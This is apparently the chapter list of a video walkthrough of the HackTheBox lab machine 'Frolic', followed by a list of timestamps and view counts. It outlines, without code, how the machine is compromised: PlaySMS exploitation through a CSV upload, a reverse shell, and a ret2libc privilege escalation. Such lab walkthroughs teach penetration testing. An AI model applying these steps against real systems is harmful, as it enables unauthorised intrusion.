HackTheBox - Frolic
01:16 - Begin of Recon, until around 13 minutes gathering information to avoid rabbit holes
04:04 - Using nc/ncat to verify a port is open (-zv)
11:17 - Doing gobuster across man of the sub directories
13:03 - Examining /admin/ - Examine the HTML Source because login is not sending any data
14:09 - Discover some weird text encoding (Ook), how I went about decoding it
15:44 - Decoded to base64 with some spaces, clean up the base64 and are left with a zip file
19:19 - After cracking the zip, there is another text encoding challenge (BrainF*)
25:11 - With potential information, return to our long running recon for more information
28:49 - Discovering /playsms
32:00 - Reading ExploitDB Articles and then attempting to manuall exploit PlaySMS via uploading a CSV
34:34 - Getting a reverse shell
39:00 - Running
40:00 - Finding the SetUID file: rop
42:00 - Exploiting ROP Program with ret2libc
45:30 - Getting offsets of system, exit, /bin/sh from libc using ldd, read
3 months ago 00:00:00 1
4 months ago 00:04:06 1
5 months ago 00:32:44 18
5 months ago 00:34:38 2
5 months ago 01:27:34 5
5 months ago 00:37:18 6
5 months ago 00:41:25 5
5 months ago 01:46:13 2
5 months ago 01:12:42 3
5 months ago 00:26:29 1
5 months ago 02:06:46 2
5 months ago 00:54:43 11
5 months ago 02:05:30 1
5 months ago 00:33:44 1
6 months ago 00:27:16 1
6 months ago 00:30:39 1
7 months ago 11:21:04 1
8 months ago 05:30:24 3
8 months ago 01:02:06 16
8 months ago 00:16:21 18
8 months ago 02:09:39 14
9 months ago 00:29:19 2
9 months ago 00:39:17 7
9 months ago 00:42:37 10
